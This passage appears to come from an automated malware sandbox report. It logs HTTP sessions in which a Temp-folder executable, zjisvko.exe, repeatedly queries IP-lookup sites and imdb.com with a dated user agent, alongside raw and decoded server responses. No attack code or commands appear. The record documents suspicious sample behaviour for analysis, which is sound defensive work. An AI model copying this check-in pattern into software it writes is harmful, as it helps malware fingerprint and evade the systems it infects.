                                                                                                                                                                                                                                                    Data Ascii: ld">8d3037aace3209d2</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    27192.168.11.304985518.64.172.225807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.029612064 CEST172OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.imdb.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.158106089 CEST586INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Server: CloudFront
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:51 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Location: https://www.imdb.com/
                                                                                                                                                                                                                                                    X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 7aea57f307e043300c172e8eaaa89c9c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MIA3-P4
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: gFl2VVoiWfvZcZTE8aCnkMnxk-aWyP5xfpzW8KwAl2sxRWRfxBr2Ww==
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    28192.168.11.3049856104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.296087027 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.456424952 CEST857INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:51 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:51 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=epwOg%2FpcoQKDxc%2B20741nAkjSxrNAwxRrApW28EW20FqUJiZiR%2F9JdXxhHy5SPChHa78VrGvemTzX1nRz07L1cRcbujEo6PXmsj0fiNm0Jgvn1IcTFcqO0hPIhy%2BFRxaWMHY4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037b5fe44db15-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    29192.168.11.3049859172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.607188940 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.748456001 CEST882INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:52 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:52 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acHzw%2BLB%2FUPbXOXVwOyeftiZ8lAZbZgKVcvlQliWal6osR%2FCHLsc0h7eoknn8Xjb6vv03Mm%2FSXuxFeVGL0LF1%2BFYkwYoMlwCvm4QJuqB5QBdH2VewXvXXhweWq6lyYAn7c4cxqZbkP8D6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037be3a063349-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    30192.168.11.3049861104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.045187950 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.210267067 CEST859INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:55 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:55 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9HAR%2Fizh8nIjq7OU9D5MQl7mQOIgs79ovL1XD0fgO%2BRFLKC7rgIvjheyPZ8fHge52Uti7eUwMubI7NaL48iOvsa%2BsvjvzMhNTrFcM83UsJSG%2BMRmQ%2B2C01WiIe79xyNaMh9aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037cd6b348754-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    31192.168.11.3049862104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.372972012 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.539766073 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:39:56 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:39:56 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnU%2BckVPb2zXIGKel4JetLoGz3QW9RpO4kolHdOXh4OVWvRUXK%2FG%2Fn7yfe4podkdH1MZn9C3JNvVmNiHFlz3YPZ23yYzpZjrH5eUJLMwIr8q0ra5jU6MU32GPDQzRuKXwBMrMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037d5bea59af1-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    32192.168.11.3049867172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.981961966 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.122845888 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:00 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:00 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pU4oCPMX%2Bp8BnVKhz7GVjV4Itjb3LLx6iu60Vs0qKvvuCNy2MoeKVTOluUcildyb7ZFAvzqaHXaoZgAKc47wAydfYsQRkviboeUeODETtsoCnOnMhp3rjIPyngAsA%2Bw0QMmT%2BCWdbWNDbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3037ec4d88a658-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    33192.168.11.3049871172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.307537079 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.478085995 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:03 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:03 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QjN1oBsyZTZjUkyK4pw1MPRPBUAJRyqjAtPIJrzEqcx9Z0Xh2EwpBOjZQol28qOIbiqeYc54kXB5Sg9KfXyuNYnxe4ULx54YjRpWTibEZGy1H%2Bb%2BbPjvqyTtdo%2F5txHhME2lqgOP0kOF0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30380118ef3347-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    34192.168.11.3049875104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.776717901 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.927970886 CEST857INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:05 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:05 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dKMLP3p%2B43tlT9sspx98II8G7tzrmaMbvJ2cfnJ17onZwqH9A4TUEWklBOB3PeHFANMx8vX8cK%2FX2E3856YExQKIyqyfZqCBqcKgMOFqnvfDpP%2FtsiqRZBSzbPC03MSsyade%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038107a3c7473-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    35192.168.11.3049877104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.105302095 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246814966 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:08 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:23 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=pCja678nNOzcnlj8AIl5cqDoL9NDLXz1QeNDVA6F_2I-1728999608-1.0.1.1-jNkPh3_JSqg3HjaMHtTxI59ZJOB0l27_29eyo1YQjFfKtfHTVh8lsilpJR0cgtg2Z6H5vvK3oW_NW5WkTN6BFg; path=/; expires=Tue, 15-Oct-24 14:10:08 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30381f0e2fa542-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246869087 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
